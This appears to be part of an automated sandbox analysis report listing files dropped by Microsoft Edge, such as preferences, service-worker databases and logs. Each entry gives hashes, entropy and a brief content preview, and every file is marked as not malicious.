                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e8799a6e-1f68-4e90-9d41-bfa0700ff059.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF414ec.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF43db1.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4721f.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4d0e9.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9757
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.109627052660825
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:stEkdpwseDBaFvrE9kmns8PbV+FIAQA+TU1P9YJ:stEQwseDBCDqbGzQ4g
                                                                                                                                                                                                                                                                                                MD5:7A40413DEB051EF474E2AF7567B53490
                                                                                                                                                                                                                                                                                                SHA1:AAB4876FCC6DCB2AEB591FAEFA259F6185BCB5AB
                                                                                                                                                                                                                                                                                                SHA-256:BED4D76473EB58012334149C6CF1048016C4FD72CD3BA5CDCE89020D77FAEFAE
                                                                                                                                                                                                                                                                                                SHA-512:CE1256B92B3357B4F3EF43EBCCE0D54CFB8B06CEC2CC5485D89E01FAF1BBF75A775EBE5674E9AD782B5E8B8DD22B0B72467B35F74F6D4C91E423CBCA4DDA2D9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379149891956490","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.567490185483211
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQxNMrWoUW5wcOf4yt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0QIGLeurwXhfpXtL:Ya+rxUWacOfTtu1jat0KrntL
                                                                                                                                                                                                                                                                                                MD5:438FDD906E9FAB2679F38815B79A49AD
                                                                                                                                                                                                                                                                                                SHA1:83097EAF926A2FFE2D3F7F2EE424B78DD10E2B32
                                                                                                                                                                                                                                                                                                SHA-256:CBCEF6D7A9FFE7B7E80E4F5F468F8E2E7E597568C5871F2256CEBDECEA2E8047
                                                                                                                                                                                                                                                                                                SHA-512:B2619B4C1E043B5F085DB40D931AF11421BCEBC59C1E7A4C5C70AEB585CA06B67923DD2BEB24C682BF49404589C7C087935121D7C436613C350791574842C0DB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF40e44.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.567490185483211
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:YQxNMrWoUW5wcOf4yt8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP0QIGLeurwXhfpXtL:Ya+rxUWacOfTtu1jat0KrntL
                                                                                                                                                                                                                                                                                                MD5:438FDD906E9FAB2679F38815B79A49AD
                                                                                                                                                                                                                                                                                                SHA1:83097EAF926A2FFE2D3F7F2EE424B78DD10E2B32
                                                                                                                                                                                                                                                                                                SHA-256:CBCEF6D7A9FFE7B7E80E4F5F468F8E2E7E597568C5871F2256CEBDECEA2E8047
                                                                                                                                                                                                                                                                                                SHA-512:B2619B4C1E043B5F085DB40D931AF11421BCEBC59C1E7A4C5C70AEB585CA06B67923DD2BEB24C682BF49404589C7C087935121D7C436613C350791574842C0DB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379149891335447","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379149891335447","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2394
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.811668193840264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:F2xc5NmycncmoDCRORpllg2hE5fRHFldCRORpllg2h8LTBFCRORpllg2hEkRHFU9:F2embMrd65fBzrd4Zrd6kBurd2Bu
                                                                                                                                                                                                                                                                                                MD5:EE2224F969C342959F1AD683A9FE191C
                                                                                                                                                                                                                                                                                                SHA1:0F3DD87179A87050BBD03C23162A1E3749B60993
                                                                                                                                                                                                                                                                                                SHA-256:B1901674AB2D48E0BF97A63838DD4861F41EE33F3AC0491AE0989DC38CACB3A0
                                                                                                                                                                                                                                                                                                SHA-512:43FA253ED73D8CA6552C662101979D2EDE46812A4EEC8095BA9D74D17DC442D70C5FCAA8EFC26F1839F150D962E28D2DF92A7C88754A64C2D741BFB71F4E5E78
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2...@.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):303
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.150881532413995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:PfJwmRq1N723oH+TcwtE/a252KLl1ZazN+q2PN723oH+TcwtE/a2ZIFUv:nqDaYeb8xLgIvVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                MD5:2DEA2C4BF1FC7D6F81EC28948979C07A
                                                                                                                                                                                                                                                                                                SHA1:0F94F490E1BF3A2FE846F82A682676976D8EBA08
                                                                                                                                                                                                                                                                                                SHA-256:B79F5C2F779771E658A38AF445ADFB2357371561AC97C0DAF01F14DD36C42F50
                                                                                                                                                                                                                                                                                                SHA-512:61E65BE3E1D1E6BA1B8E6AF3353D870176AE6B644543851DCF877E942DE7FFFE24553CC954677CA6DA6E18FB9DCAEBDB0C931CF3139E46BA4BFE496454859ABF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2024/12/20-01:31:49.026 1538 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/20-01:31:49.046 1538 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):114579
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.579416393070104
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsyIZ7QgyO/u:J9LyxPXfOxr1lMe1nL/5L/TXE6W7vc
                                                                                                                                                                                                                                                                                                MD5:7C8444D46047A546A5F55C543715EDC5
                                                                                                                                                                                                                                                                                                SHA1:D7783332D103CBB5A0EB051C85CF8B31C60A5192
                                                                                                                                                                                                                                                                                                SHA-256:02960A7F0BADC585C12CBCF2B048DF6E934349EFDE59B9A76E779EA3226EBFCD
                                                                                                                                                                                                                                                                                                SHA-512:BE296E7BE8EA6A793175DAE63B7FE47A91B40750587AC007CF4D8FA5C9A331D61B0F2F309A197BE8E1D9768AD08B061F315EA95A1C95379F48D20C0F02DB2262
                                                                                                                                                                                                                                                                                                Malicious:false
